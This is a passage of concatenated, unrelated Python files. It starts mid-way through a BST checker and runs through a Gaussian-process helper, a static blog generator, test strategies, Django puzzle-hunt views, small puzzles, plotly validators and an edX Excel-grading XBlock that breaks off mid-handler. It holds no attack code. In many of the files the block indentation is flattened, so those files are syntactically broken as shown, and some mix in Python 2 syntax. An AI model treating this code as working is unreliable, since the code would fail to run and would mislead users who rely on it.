return False
    lastNode[0] = tree.val
return isBST2(tree.right, lastNode)
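# Minimal usage sketch: a valid three-node BST, then a broken one.
if __name__ == "__main__":
    root = Node(2)
    root.left, root.right = Node(1), Node(3)
    assert isBST(root) and isBST2(root)
    root.right.val = 0  # violates the BST property
    assert not isBST(root)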
|
from __future__ import division
import numpy as np
from numpy.linalg import solve
def cov_mat(x1, x2, a, b):
return a * np.exp(-b * (x1[:, np.newaxis] - x2)**2)
def reg_cov_mat(x, a, b, c):
return cov_mat(x, x, a, b) + c * np.eye(x.shape[0])
def compute_means_covs(ts, t_ref, gp_parms, winsize=0, mean_shift=True):
"""
Compute the posterior GP means and covariance matrices.
ts: time series
t_ref: reference time points the posterior GP is marginalized over
gp_parms: GP hyperparameters and the noise term
winsize: window size, 0 for using the full Gaussian (over t_ref)
"""
a, b, c = gp_parms
K_test = cov_mat(t_ref, t_ref, a, b)
n_ts = len(ts)
n_sample = len(t_ref)
if winsize == 0:
post_means = np.empty((n_ts, n_sample))
post_covs = np.empty((n_ts, n_sample, n_sample))
else:
n_kernel = n_sample - winsize + 1
post_means = np.empty((n_ts, n_kernel, winsize))
post_covs = np.empty((n_ts, n_kernel, winsize, winsize))
for idx, (t, y) in enumerate(ts):
K_train = reg_cov_mat(t, a, b, c)
K_train_test = cov_mat(t, t_ref, a, b)
Ktr_inv_Ktt = solve(K_train, K_train_test)
if mean_shift:
mu = np.mean(y)
mean_test = mu + Ktr_inv_Ktt.T.dot(y - mu)
else:
mean_test = Ktr_inv_Ktt.T.dot(y)
full_cov = K_test - K_train_test.T.dot(Ktr_inv_Ktt)
if winsize == 0:
post_means[idx] = mean_test
post_covs[idx] = full_cov
else:
for i in xrange(n_sample - winsize + 1):
post_means[idx, i] = mean_test[i:(i + winsize)]
post_covs[idx, i] = full_cov[i:(i + winsize), i:(i + winsize)]
return post_means, post_covs
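# Usage sketch with synthetic data (the hyperparameters are made up):
#
#   t = np.linspace(0, 1, 20)
#   y = np.sin(2 * np.pi * t) + 0.1 * np.random.randn(20)
#   t_ref = np.linspace(0, 1, 10)
#   means, covs = compute_means_covs([(t, y)], t_ref, (1.0, 10.0, 0.01))
#   print means.shape, covs.shape   # (1, 10) (1, 10, 10)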
|
import arrow
from jinja2 import Environment, FileSystemLoader, select_autoescape
import mistune
from yaml import load
import os
from pathlib import Path
import pygments
from pygments import highlight
from pygments.lexers import get_lexer_by_name
from pygments.formatters import html
import shutil
import re
from xml.dom import minidom
import xml.etree.ElementTree as ET
env = Environment(loader=FileSystemLoader("layouts"))
class CustomRenderer(mistune.Renderer):
def codespan(self, text):
return "<code class=\"highlight\">{}</code>".format(text)
def link(self, link, title, content):
if link.startswith("http://") or link.startswith("https://"):
return super().link(link, title, content)
else:
fname, _ = parse_post_filename(link)
return super().link(fname, title, content)
def block_code(self, code, lang):
if not lang:
return "\n<pre><code>{}</code></pre>\n".format(
mistune.escape(code)
)
lexer = get_lexer_by_name(lang, stripall=True)
formatter = html.HtmlFormatter()
return highlight(code, lexer, formatter)
def toc(self):
return self.render_toc()
def reset_toc(self):
self.toc_tree = []
self.toc_count = 0
def header(self, text, level, raw=None):
rv = '<h%d id="toc-%d">%s</h%d>\n' % (
level, self.toc_count, text, level
)
self.toc_tree.append((self.toc_count, text, level, raw))
self.toc_count += 1
return rv
def render_toc(self, level=3):
return "".join(self._iter_toc(level))
def _iter_toc(self, level):
first_level = 0
last_level = 0
yield "<ul id=\"table-of-content\">\n"
for toc in self.toc_tree:
index, text, l, raw = toc
if l > level:
continue
            if first_level == 0:
# based on first level
first_level = l
last_level = l
yield "<li><a href=\"#toc-{0}\">{1}</a>".format(
index, text)
elif last_level == l:
yield "</li>\n<li><a href=\"#toc-{0}\">{1}</a>".format(
index, text)
elif last_level == l - 1:
last_level = l
yield "<ul>\n<li><a href=\"#toc-{0}\">{1}</a>".format(
index, text)
elif last_level > l:
# close indention
yield "</li>"
while last_level > l:
yield "</ul>\n</li>\n"
last_level -= 1
yield "<li><a href=\"#toc-{0}\">{1}</a>".format(
index, text)
# close tags
yield "</li>\n"
while last_level > first_level:
yield "</ul>\n</li>\n"
last_level -= 1
yield "</ul>\n"
def rfc_link(self, rfc_number):
return (
"<a href=\"https://tools.ietf.org/html/rfc{0}\">RFC{0}</a>"
).format(rfc_number)
class CustomLexer(mistune.InlineLexer):
def enable_rfc_link(self):
self.rules.rfc_link = re.compile(r"\[\[RFC([0-9]*)\]\]")
self.default_rules.insert(3, "rfc_link")
def output_rfc_link(self, m):
rfc_number = m.group(1)
return self.renderer.rfc_link(rfc_number)
custom_renderer = CustomRenderer()
custom_lexer = CustomLexer(custom_renderer)
custom_lexer.enable_rfc_link()
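# With the rule enabled, inline text such as "[[RFC2616]]" is rendered by
# rfc_link() above as a link to https://tools.ietf.org/html/rfc2616.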
ms_markdown = mistune.Markdown(renderer=custom_renderer, inline=custom_lexer)
def render_post_html(markdown, post_title, post_date):
template = env.get_template("post.html")
custom_renderer.reset_toc()
content = ms_markdown(markdown)
    # Substitute the {:toc} placeholder with our generated TOC.
toc = custom_renderer.render_toc(level=1)
content = re.sub(r"\{:toc\}", toc, content)
return template.render(
post_title=post_title,
post_content=content,
page_title=post_title,
post_date=post_date.format("DD MMMM YYYY")
)
def render_page_html(markdown, post_title):
template = env.get_template("page.html")
custom_renderer.reset_toc()
content = ms_markdown(markdown)
return template.render(
post_title=post_title,
post_content=content,
page_title=post_title,
)
def render_index_page(posts):
template = env.get_template("index.html")
return template.render(posts=posts, page_title="Home")
def parse_frontmatter(frontmatter):
return load(frontmatter)
def read_file(f):
first = f.readline()
if first == "---\n":
frontmatter = ""
while True:
line = f.readline()
if line == "---\n":
break
frontmatter += line
markdown = f.read()
return frontmatter, markdown
else:
return None, first + f.read()
def parse_post_filename(fname):
url = fname[11:]
date = fname[:10]
return url, arrow.get(date, "YYYY-MM-DD")
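# e.g. parse_post_filename("2015-01-30-hello-world") returns
# ("hello-world", <Arrow for 2015-01-30>) for a hypothetical post file.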
def build_site():
posts = []
# Make output directory
try:
shutil.rmtree("output")
except FileNotFoundError:
pass
os.makedirs("output", exist_ok=True)
shutil.copytree("public", "output/public")
shutil.copytree("assets", "output/assets")
shutil.copy("favi.ico", "output/favi.ico")
# Iterate and render all files in the pages/ directory.
p = Path("pages")
for i in p.glob("*.md"):
with i.open("r") as f:
frontmatter, markdown = read_file(f)
fname = i.stem
frontmatter = parse_frontmatter(frontmatter)
html = render_page_html(markdown, frontmatter["title"])
with open("output/{}.html".format(fname), "w") as f:
f.write(html)
# Iterate and render all files in the posts/ directory.
p = Path("posts")
for i in p.glob("*.md"):
with i.open("r") as f:
frontmatter, markdown = read_file(f)
fname, date = parse_post_filename(i.stem)
frontmatter = parse_frontmatter(frontmatter)
html = render_post_html(markdown, frontmatter["title"], date)
with open("output/{}.html".format(fname), "w") as f:
f.write(html)
posts.append({
"title": frontmatter["title"],
"url": fname,
"date": date
})
posts.sort(key=lambda i: i["date"], reverse=True)
for i in posts:
i["date"] = i["date"].format("YYYY-MM-DD")
html = render_index_page(posts)
with open("output/index.html", "w") as f:
f.write(html)
rss = ET.Element("rss", version="2.0")
rss_channel = ET.SubElement(rss, "channel")
ET.SubElement(rss_channel, "title").text = "Ayrx's Blog"
ET.SubElement(rss_channel, "description").text = "Information Security"
ET.SubElement(rss_channel, "link").text = "https://www.ayrx.me"
for i in posts:
rss_item = ET.SubElement(rss_channel, "item")
ET.SubElement(rss_item, "title").text = i["title"]
ET.SubElement(
rss_item, "link").text = "https://www.ayrx.me/{}".format(i["url"])
    doc = minidom.parseString(ET.tostring(rss))
    with open("output/feed.xml", "wb") as f:
        f.write(doc.toprettyxml(encoding="utf-8"))
|
from typing import Tuple
from hypothesis import strategies
from cetus.queries.filters import (PREDICATES,
LOGICAL_OPERATORS,
INCLUSION_OPERATORS,
RANGE_OPERATORS,
COMPARISON_OPERATORS)
from cetus.types import ColumnValueType
from .utils import date_times_strategy
from tests.strategies.utils import identifiers_strategy
predicates_names_strategy = strategies.one_of(strategies.just(predicate)
for predicate in PREDICATES)
values_strategy = strategies.one_of(date_times_strategy,
strategies.booleans(),
strategies.integers(),
strategies.floats(
allow_infinity=False,
allow_nan=False),
strategies.text())
values_lists_strategy = strategies.lists(values_strategy)
values_range_strategy = strategies.tuples(values_strategy,
values_strategy)
filter_strategy = strategies.tuples(identifiers_strategy,
strategies.one_of(
values_strategy,
values_lists_strategy,
values_range_strategy))
def predicates_has_correct_value(
predicate: Tuple[str, Tuple[str, ColumnValueType]]) -> bool:
predicate_name, filter_ = predicate
_, value = filter_
inclusion_operator_has_list_value = (
predicate_name not in INCLUSION_OPERATORS or
isinstance(value, list))
range_operator_has_tuple_value = (
predicate_name not in RANGE_OPERATORS or
isinstance(value, tuple))
comparison_operator_has_simple_value = (
predicate_name not in COMPARISON_OPERATORS or
not isinstance(value, (tuple, list)))
return (inclusion_operator_has_list_value and
range_operator_has_tuple_value and
comparison_operator_has_simple_value)
predicates_strategy = (strategies.tuples(predicates_names_strategy,
filter_strategy)
.filter(predicates_has_correct_value))
predicates_lists_strategy = strategies.lists(predicates_strategy)
logical_operators_names_strategy = strategies.one_of(
strategies.just(operator)
for operator in LOGICAL_OPERATORS)
logical_operators_strategy = strategies.tuples(logical_operators_names_strategy,
predicates_lists_strategy)
filters_strategy = strategies.recursive(
predicates_strategy,
lambda child: strategies.tuples(logical_operators_names_strategy,
strategies.lists(child)))
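# Usage sketch inside a test module (hypothesis's @given drives generation):
#
#   from hypothesis import given
#
#   @given(filters_strategy)
#   def test_handles_any_filter(filter_):
#       ...  # exercise the code under test with the generated filter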
|
from django.contrib.auth.decorators import login_required
from django.db.models.functions import Lower
from django.shortcuts import render
from django.contrib import messages
import random
import re
from .models import Hunt, Team
from .forms import PersonForm, ShibUserForm
import logging
logger = logging.getLogger(__name__)
def index(request):
""" Main landing page view, mostly static with the exception of hunt info """
curr_hunt = Hunt.objects.get(is_current_hunt=True)
team = curr_hunt.team_from_user(request.user)
return render(request, "index.html", {'curr_hunt': curr_hunt, 'team': team})
def previous_hunts(request):
""" A view to render the list of previous hunts, will show any hunt that is 'public' """
    old_hunts = Hunt.objects.filter(is_public=True).order_by("hunt_number")
return render(request, "previous_hunts.html", {'hunts': old_hunts})
def registration(request):
"""
The view that handles team registration. Mostly deals with creating the team object from the
post request. The rendered page is nearly entirely static.
"""
curr_hunt = Hunt.objects.get(is_current_hunt=True)
team = curr_hunt.team_from_user(request.user)
if(request.method == 'POST' and "form_type" in request.POST):
if(request.POST["form_type"] == "new_team" and team is None):
if(curr_hunt.team_set.filter(team_name__iexact=request.POST.get("team_name")).exists()):
messages.error(request, "The team name you have provided already exists.")
elif(re.match(".*[A-Za-z0-9].*", request.POST.get("team_name"))):
join_code = ''.join(random.choice("ACDEFGHJKMNPRSTUVWXYZ2345679") for _ in range(5))
team = Team.objects.create(team_name=request.POST.get("team_name"), hunt=curr_hunt,
location=request.POST.get("need_room"),
join_code=join_code)
request.user.person.teams.add(team)
logger.info("User %s created team %s" % (str(request.user), str(team)))
else:
messages.error(request,
"Your team name must contain at least one alphanumeric character.")
elif(request.POST["form_type"] == "join_team" and team is None):
team = curr_hunt.team_set.get(team_name=request.POST.get("team_name"))
if(len(team.person_set.all()) >= team.hunt.team_size):
messages.error(request, "The team you have tried to join is already full.")
team = None
elif(team.join_code.lower() != request.POST.get("join_code").lower()):
messages.error(request, "The team join code you have entered is incorrect.")
team = None
else:
request.user.person.teams.add(team)
logger.info("User %s joined team %s" % (str(request.user), str(team)))
elif(request.POST["form_type"] == "leave_team"):
request.user.person.teams.remove(team)
logger.info("User %s left team %s" % (str(request.user), str(team)))
if(team.person_set.count() == 0 and team.hunt.is_locked):
logger.info("Team %s was deleted because it was empty." % (str(team)))
team.delete()
team = None
messages.success(request, "You have successfully left the team.")
elif(request.POST["form_type"] == "new_location" and team is not None):
old_location = team.location
team.location = request.POST.get("team_location")
team.save()
logger.info("User %s changed the location for team %s from %s to %s" %
(str(request.user), str(team.team_name), old_location, team.location))
messages.success(request, "Location successfully updated")
elif(request.POST["form_type"] == "new_name" and team is not None and
not team.hunt.in_reg_lockdown):
if(curr_hunt.team_set.filter(team_name__iexact=request.POST.get("team_name")).exists()):
messages.error(request, "The team name you have provided already exists.")
else:
old_name = team.team_name
team.team_name = request.POST.get("team_name")
team.save()
logger.info("User %s renamed team %s to %s" %
(str(request.user), old_name, team.team_name))
messages.success(request, "Team name successfully updated")
if(team is not None):
return render(request, "registration.html",
{'registered_team': team, 'curr_hunt': curr_hunt})
else:
teams = curr_hunt.real_teams.order_by(Lower('team_name'))
return render(request, "registration.html",
{'teams': teams, 'curr_hunt': curr_hunt})
@login_required
def user_profile(request):
""" A view to handle user information update POST data and render the user information form. """
if request.method == 'POST':
uf = ShibUserForm(request.POST, instance=request.user)
pf = PersonForm(request.POST, instance=request.user.person)
if uf.is_valid() and pf.is_valid():
uf.save()
pf.save()
messages.success(request, "User information successfully updated.")
else:
context = {'user_form': uf, 'person_form': pf}
return render(request, "user_profile.html", context)
user_form = ShibUserForm(instance=request.user)
person_form = PersonForm(instance=request.user.person)
context = {'user_form': user_form, 'person_form': person_form}
return render(request, "user_profile.html", context)
|
people = [
    {
        'name': "Мария",
        'interests': ['travel', 'dancing', 'swimming', 'cinema'],
        'gender': "female",
    },
    {
        'name': "Диана",
        'interests': ['fashion', 'sport shooting', 'reading', 'Scandinavian poetry'],
        'gender': "female",
    },
    {
        'name': "Дарина",
        'interests': ['dancing', 'poker', 'history', 'software'],
        'gender': "female",
    },
    {
        'name': "Лилия",
        'interests': ['poker', 'cars', 'dancing', 'cinema'],
        'gender': "female",
    },
    {
        'name': "Галя",
        'interests': ['travel', 'cars', 'swimming', 'basketball'],
        'gender': "female",
    },
    {
        'name': "Валерия",
        'interests': ['swimming', 'poker', 'science', 'Scandinavian poetry'],
        'gender': "female",
    },
    {
        'name': "Ина",
        'interests': ['cinema', 'falconry', 'travel', 'fashion'],
        'gender': "female",
    },
    {
        'name': "Кирил",
        'interests': ['basketball', 'cars', 'cinema', 'science'],
        'gender': "male",
    },
    {
        'name': "Георги",
        'interests': ['cars', 'football', 'swimming', 'dancing'],
        'gender': "male",
    },
    {
        'name': "Андрей",
        'interests': ['football', 'Scandinavian poetry', 'history', 'dancing'],
        'gender': "male",
    },
    {
        'name': "Емил",
        'interests': ['flying', 'basketball', 'software', 'science'],
        'gender': "male",
    },
    {
        'name': "Димитър",
        'interests': ['football', 'falconry', 'cars', 'basketball'],
        'gender': "male",
    },
    {
        'name': "Петър",
        'interests': ['travel', 'poker', 'basketball', 'falconry'],
        'gender': "male",
    },
    {
        'name': "Калоян",
        'interests': ['history', 'poker', 'travel', 'cars'],
        'gender': "male",
    },
]
|
from utils import parse_date
import datetime
import unittest
class TestLateTube(unittest.TestCase):
def test_calculate_duration(self):
self.assertEqual(0, 0)
def test_parse_date(self):
dt = parse_date("19-Aug-2017", "19:33")
self.assertEqual(datetime.datetime(2017, 8, 19, 19, 33), dt)
def test_parse_date_morning(self):
dt = parse_date("19-Aug-2017", "09:33")
self.assertEqual(datetime.datetime(2017, 8, 19, 9, 33), dt)
if __name__ == '__main__':
unittest.main()
|
str = "print(3*(2-3^8))"#raw_input()
stack = []
queue = []
for index, c in enumerate(str):
print(index, c)
raw_input()
|
import _plotly_utils.basevalidators
class NameValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self,
plotly_name="name",
parent_name="heatmap.colorbar.tickformatstop",
**kwargs
):
super(NameValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
**kwargs
)
|
import _plotly_utils.basevalidators
class TickmodeValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self, plotly_name="tickmode", parent_name="contour.colorbar", **kwargs
):
super(TickmodeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
implied_edits=kwargs.pop("implied_edits", {}),
values=kwargs.pop("values", ["auto", "linear", "array"]),
**kwargs
)
|
def check(s):
    # Validity rules: no 'i', 'o' or 'l'; at least two pairs of different
    # letters; and at least one increasing straight of three consecutive
    # letters (e.g. "abc").
    if( 'i' in s or 'o' in s or 'l' in s):
        return 0
    count = 0
    flag = 0
    char = ""
    for i in range(len(s)-1):
        if(s[i] == s[i+1] and s[i] not in char):
            count += 1
            char += s[i]
    for i in range(len(s)-2):
        if(s[i] == chr(ord(s[i+1])-1) and s[i+1] == chr(ord(s[i+2])-1)):
            flag = 1
    if(count >= 2 and flag == 1):
        return 1
    else:
        return 0
def gen(s):
    # Increment the password like a base-26 number: bump the last letter,
    # wrapping 'z' around to 'a' and carrying into the preceding position.
    temp = ""
    if( (ord(s[len(s)-1]) - 96) == 26 ):
        temp += gen(s[:len(s)-1]) + "a"
    else:
        return (s[:len(s)-1] + chr(ord(s[len(s)-1])+1))
    return temp
print gen("abcdefgh")
test = 0
string = "vzbxxyzz"
while(test == 0):
string = gen(string)
if(check(string)):
test = 1
print string
|
"""find the length of longest subsequence present in both of them.
A subsequence is a sequence that appears in the same relative order, but not necessarily contiguous.
Examples:
LCS for input Sequences “ABCDGH” and “AEDFHR” is “ADH” of length 3.
LCS for input Sequences “AGGTAB” and “GXTXAYB” is “GTAB” of length 4."""
def lcs(str1, str2):
m = len(str1)
n = len(str2)
    matrix = [[0 for i in range(n+1)] for i in range(m+1)]
    # Fill the DP table: matrix[i][j] holds the LCS length of str1[:i] and
    # str2[:j]. Row 0 and column 0 stay zero from the initialization, so the
    # loops start at 1.
    for i in range(1, m+1):
        for j in range(1, n+1):
            if str1[i-1] == str2[j-1]:
                matrix[i][j] = 1 + matrix[i-1][j-1]
            else:
                matrix[i][j] = max(matrix[i-1][j], matrix[i][j-1])
index = matrix[m][n]
res = [""] * index
i = m
j = n
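    # Backtrack from matrix[m][n]: move diagonally on character matches,
    # otherwise step toward the larger neighbor, to recover one LCS string.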
while i > 0 and j > 0:
if str1[i-1] == str2[j-1]:
res[index-1] = str1[i-1]
i -= 1
j -= 1
index -= 1
elif matrix[i-1][j] > matrix[i][j-1]:
i -= 1
else:
j -= 1
return res
if __name__ == '__main__':
X = "AGGTAB"
Y = "GXTXAYB"
    subseq = ''.join(lcs(X, Y))
    print("Length of longest common subsequence is:", len(subseq), "\nAnd the subsequence is:", subseq)
|
import datetime
import hashlib
import json
import logging
import mimetypes
import os
import pkg_resources
import pytz
import grades
from functools import partial
from courseware.models import StudentModule
from django.core.exceptions import PermissionDenied
from django.core.files import File
from django.core.files.storage import default_storage
from django.conf import settings
from django.template import Context, Template
from student.models import user_by_anonymous_id
from submissions import api as submissions_api
from submissions.models import StudentItem as SubmissionsStudent
from webob.response import Response
from xblock.core import XBlock
from xblock.exceptions import JsonHandlerError
from xblock.fields import Dict, Scope, String, Float, Integer
from xblock.fragment import Fragment
from file_storage import save_file
import storage
from xmodule.util.duedate import get_extended_due_date
from grader import *
log = logging.getLogger(__name__)
BLOCK_SIZE = 8 * 1024
FORCE_EVAL_EVERYTIME = True
IMAGEDIFF_ROOT = "/edx/var/edxapp/media/"
def reify(meth):
    """Memoizing property: compute once, then serve the cached value."""
    def getter(inst):
        # property() is a data descriptor, so writing to the instance
        # __dict__ alone would never shadow it; cache explicitly instead.
        if meth.__name__ not in inst.__dict__:
            inst.__dict__[meth.__name__] = meth(inst)
        return inst.__dict__[meth.__name__]
    return property(getter)
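# Illustration (a sketch; _ReifyDemo is hypothetical and not part of this
# XBlock): with reify, the wrapped method runs once per instance.
class _ReifyDemo(object):
    calls = 0
    @reify
    def value(self):
        _ReifyDemo.calls += 1
        return 42
# d = _ReifyDemo(); d.value; d.value  ->  _ReifyDemo.calls == 1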
class ExcelSheetAssessmentXBlock(XBlock):
has_score = True
icon_class = 'problem'
STUDENT_FILEUPLOAD_MAX_SIZE = 4 * 1000 * 1000 # 4 MB
display_name = String(
display_name = 'Block Type',
default='Excel Sheet Assessment', scope=Scope.settings,
help="This is the question title."
)
question = String(
display_name = "Question text",
default='Your Question Statement appears here', scope=Scope.settings,
help="This is the question text that is shown to the student alongside the "
"uploaded question file."
)
title = String(
display_name = "Question title",
default='Your Question Title appears here', scope=Scope.settings,
help="This is the question title that appears at the top of the problem"
)
weight = Float(
display_name="Problem Weight",
help=("Defines the number of points each problem is worth. "
"If the value is not set, the problem is worth the sum of the "
"option point values."),
default=1.0,
values={"min": 1, "step": .1},
scope=Scope.settings
)
points = Integer(
display_name = "Score to be graded out of",
help = "The minimum score to be obtained so as to be awarded full credit",
default=100,
scope=Scope.settings
)
score = Integer(
display_name="Score assigned by autograder",
help = "Absolute score assigned by the autograder",
default=None,
scope=Scope.user_state
)
attempts = Integer(
display_name = "No of attempts",
help=("Number of attempts taken by the student on this problem."),
default=0,
scope=Scope.user_state)
max_attempts = Integer(
display_name=("Maximum attempts permitted"),
help=("Defines the number of times a student can try to answer this problem. "
"If the value is not set, infinite attempts are allowed."),
scope=Scope.settings
)
raw_answer=Dict(
default={},
help=("Dict internally used to store the sha1, mimetype, filename of the last uploaded assignment"),
scope=Scope.user_state
)
raw_question=Dict(
default={},
help=("Dict internally used to store the sha1, mimetype, filename of the last uploaded question"),
scope=Scope.settings
)
raw_solution=Dict(
default={},
help=("Dict internally used to store the sha1, mimetype, filename of the last uploaded solution"),
scope=Scope.settings
)
def max_score(self):
return self.points
@reify
def block_id(self):
return self.scope_ids.usage_id
def get_submission(self):
"""
Returns the raw_answer dictionary
"""
submissions = self.raw_answer
if submissions is not None:
return {
"answer": self.raw_answer
}
def get_question(self):
"""
Returns the raw_question dictionary
"""
question = self.raw_question
if question is not None:
return {
"question": self.raw_question
}
def get_solution(self):
"""
Returns the raw_solution dictionary
"""
solution = self.raw_solution
if solution is not None:
return {
"solution": self.raw_solution
}
def student_view(self, context=None):
# pylint: disable=no-member
"""
Student view, renders the content of LMS
"""
log.info("Studnent view called")
log.info(self)
context = {
"student_state": json.dumps(self.student_state()),
"id": self.location.name.replace('.', '_'),
"max_file_size": getattr(
settings, "STUDENT_FILEUPLOAD_MAX_SIZE",
self.STUDENT_FILEUPLOAD_MAX_SIZE
)
}
fragment = Fragment()
fragment.add_content(
render_template(
'templates/assignment/show.html',
context
)
)
fragment.add_javascript(_resource("static/js/src/agea.js"))
fragment.initialize_js('ExcelSheetAssessmentXBlock')
return fragment
def student_state(self):
"""
Returns the context for rendering the student view in the form of a dictionary
"""
submission = self.get_submission()
if submission:
uploaded_submission = submission.get("answer").get("filename", None)
if uploaded_submission:
uploaded = {"filename": submission['answer']['filename']}
else:
uploaded = None
else:
uploaded = None
submission = self.get_question()
if submission:
uploaded_submission = submission.get("question").get("filename", None)
if uploaded_submission:
quploaded = {"filename": submission['question']['filename']}
else:
quploaded = None
else:
quploaded = None
submission = self.get_solution()
if submission:
uploaded_submission = submission.get("solution").get("filename", None)
if uploaded_submission:
suploaded = {"filename": submission['solution']['filename']}
else:
suploaded = None
else:
suploaded = None
return {
"display_name": self.title,
"question":self.question,
"uploaded": uploaded,
"quploaded":quploaded,
"suploaded":suploaded,
"raw_answer":self.raw_answer,
"raw_question":self.raw_question,
"score": self.score,
"weight":self.weight,
"attempts": self.attempts,
"max_attempts": self.max_attempts,
}
def studio_state(self):
"""
Returns the context for rendering the studio view in the form of a dictionary
"""
submission = self.get_question()
if submission:
uploaded_submission = submission.get("question").get("filename", None)
if uploaded_submission:
quploaded = {"filename": submission['question']['filename']}
else:
quploaded = None
else:
quploaded = None
submission = self.get_solution()
if submission:
uploaded_submission = submission.get("solution").get("filename", None)
if uploaded_submission:
suploaded = {"filename": submission['solution']['filename']}
else:
suploaded = None
else:
suploaded = None
return {
"display_name": self.title,
"question":self.question,
"uploaded": quploaded,
"suploaded":suploaded,
"raw_question" : self.raw_question,
"solutionUploaded": suploaded,
"raw_soluion": self.raw_solution,
"weight":self.weight
}
def studio_view(self, context=None):
"""
Studio view, renders the content of CMS
"""
log.info("Studio view called")
log.info(self)
cls = type(self)
def none_to_empty(data):
return data if data is not None else ''
edit_fields = (
(field, none_to_empty(getattr(self, field.name)), validator)
for field, validator in (
(cls.title, 'string'),
(cls.question,'string'),
(cls.points, 'number'),
(cls.weight, 'number'),
(cls.max_attempts, 'number')
)
)
context = {
"studio_state": json.dumps(self.studio_state()),
"id": self.location.name.replace('.', '_'),
"max_file_size": getattr(
settings, "STUDENT_FILEUPLOAD_MAX_SIZE",
self.STUDENT_FILEUPLOAD_MAX_SIZE,
),
'fields': edit_fields
}
fragment = Fragment()
fragment.add_content(
render_template(
'templates/assignment/edit.html',
context
)
)
fragment.add_css(_resource("static/css/agea.css"))
fragment.add_javascript(_resource("static/js/src/studio.js"))
fragment.initialize_js('ExcelSheetAssessmentXBlock')
return fragment
@XBlock.json_handler
def save_agea(self, data, suffix=''):
"""
Persist block data when updating settings in studio.
"""
self.title = data.get('title', self.title)
self.question = data.get('question', self.question)
self.raw_question = data.get('raw_question',self.raw_question)
self.raw_solution= data.get('raw_solution',self.raw_solution)
self.max_attempts = data.get('max_attempts', self.max_attempts)
# Validate points before saving
points = data.get('points', self.points)
# Check that we are an int
try:
points = int(points)
except ValueError:
raise JsonHandlerError(400, '"Score to be graded out of" must be an integer')
# Check that we are positive
if points < 0:
raise JsonHandlerError(400, '"Score to be graded out of" must be a positive integer')
self.points = points
# Validate weight before saving
weight = data.get('weight', self.weight)
# Check that weight is a float.
if weight:
try:
weight = float(weight)
except ValueError:
raise JsonHandlerError(400, 'Weight must be a decimal number')
# Check that we are positive
if weight < 0:
raise JsonHandlerError(
400, 'Weight must be a positive decimal number'
)
self.weight = weight
submission = self.get_question()
if submission:
uploaded_submission = submission.get("question").get("filename", None)
if uploaded_submission:
question = self._question_storage_path(self.raw_question['sha1'], self.raw_question['filename'])
question = os.path.join(IMAGEDIFF_ROOT, question)
actual=total_marks(question)
if actual < points:
raise JsonHandlerError(400, '"Score to be graded out of" should be less than equal to the maximum attainable score for the question paper you uploaded')
self.save()
log.info(self)
@XBlock.handler
def upload_assignment(self, request, suffix=''):
"""
        Uploads the student file to the local disk, pushes it through the storage api, grades it, and then deletes the local copy
"""
log.info("upload_assignment called")
upload = request.params['assignment']
sha1 = _get_sha1(upload.file)
log.info(type(upload.file))
answer = {
"sha1": sha1,
"filename": upload.file.name,
"mimetype": mimetypes.guess_type(upload.file.name)[0]
}
self.raw_answer = answer
path = self._file_storage_path(sha1, upload.file.name)
log.info("upload1-----------------------------------------------")
filepathexists=os.path.join(IMAGEDIFF_ROOT, path)
file_exists=os.path.exists(filepathexists)
if not file_exists:
log.info("saving the file onto local store")
save_file(path, File(upload.file))
file_exists=True
try:
storage.store_data(str(self.course_id), str(self.xmodule_runtime.anonymous_student_id), str(self.location.block_id), file(IMAGEDIFF_ROOT + path))
log.info("upload through storage api successful")
        except PersonValueError:
            log.info("storage api upload failed:")
            log.info("person argument can't be an empty string")
        except DepartmentValueError:
            log.info("storage api upload failed:")
            log.info("department argument can't be an empty string")
        except QualifierValueError:
            log.info("storage api upload failed:")
            log.info("qualifier argument can't be an empty string")
        except BucketValueError:
            log.info("storage api upload failed:")
            log.info("invalid bucket key argument")
        except S3ValueError:
            log.info("storage api upload failed:")
            log.info("invalid S3 credentials")
        except SocketValueError:
            log.info("storage api upload failed:")
            log.info("invalid host")
log.info("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$")
log.info(self)
self.grade_this_guy()
if self.score != -1:
self.attempts += 1
os.remove(IMAGEDIFF_ROOT + path)
return Response(json_body=self.student_state())
@XBlock.handler
def upload_question(self, request, suffix=''):
"""
Uploads the question file on local disk, then calls storage api
"""
log.info("upload_question called")
qupload = request.params['qassignment']
sha1 = _get_sha1(qupload.file)
question = {
"sha1": sha1,
"filename": qupload.file.name,
"mimetype": mimetypes.guess_type(qupload.file.name)[0]
}
self.raw_question = question
path = self._question_storage_path(sha1, qupload.file.name)
filepathexists=os.path.join(IMAGEDIFF_ROOT, path)
file_exists=os.path.exists(filepathexists)
if not file_exists:
save_file(path, File(qupload.file))
file_exists=True
log.info("File uploaded locally")
try:
storage.store_data(str(self.course_id), "question", str(self.location.block_id), file(IMAGEDIFF_ROOT + path))
log.info("upload through storage api successful")
        except PersonValueError:
            log.info("storage api upload failed:")
            log.info("person argument can't be an empty string")
        except DepartmentValueError:
            log.info("storage api upload failed:")
            log.info("department argument can't be an empty string")
        except QualifierValueError:
            log.info("storage api upload failed:")
            log.info("qualifier argument can't be an empty string")
        except BucketValueError:
            log.info("storage api upload failed:")
            log.info("invalid bucket key argument")
        except S3ValueError:
            log.info("storage api upload failed:")
            log.info("invalid S3 credentials")
        except SocketValueError:
            log.info("storage api upload failed:")
            log.info("invalid host")
self.save()
return Response(json_body=self.studio_state())
@XBlock.handler
def upload_solution(self, request, suffix=''):
"""
Uploads the solution file on local disk, then calls storage api
"""
upload = request.params['sassignment'] #TODO:change name
sha1 = _get_sha1(upload.file)
solution = {
"sha1": sha1,
"filename": upload.file.name,
"mimetype": mimetypes.guess_type(upload.file.name)[0]
}
        self.raw_solution = solution
path = self._solution_storage_path(sha1, upload.file.name)
log.info("Solution Upload Path" + path)
filepathexists=os.path.join(IMAGEDIFF_ROOT, path)
file_exists=os.path.exists(filepathexists)
if not file_exists:
save_file(path, File(upload.file))
file_exists=True
try:
storage.store_data(str(self.course_id), "solution", str(self.location.block_id), file(IMAGEDIFF_ROOT + path))
log.info("upload through storage api successful")
        except PersonValueError:
            log.info("storage api upload failed:")
            log.info("person argument can't be an empty string")
        except DepartmentValueError:
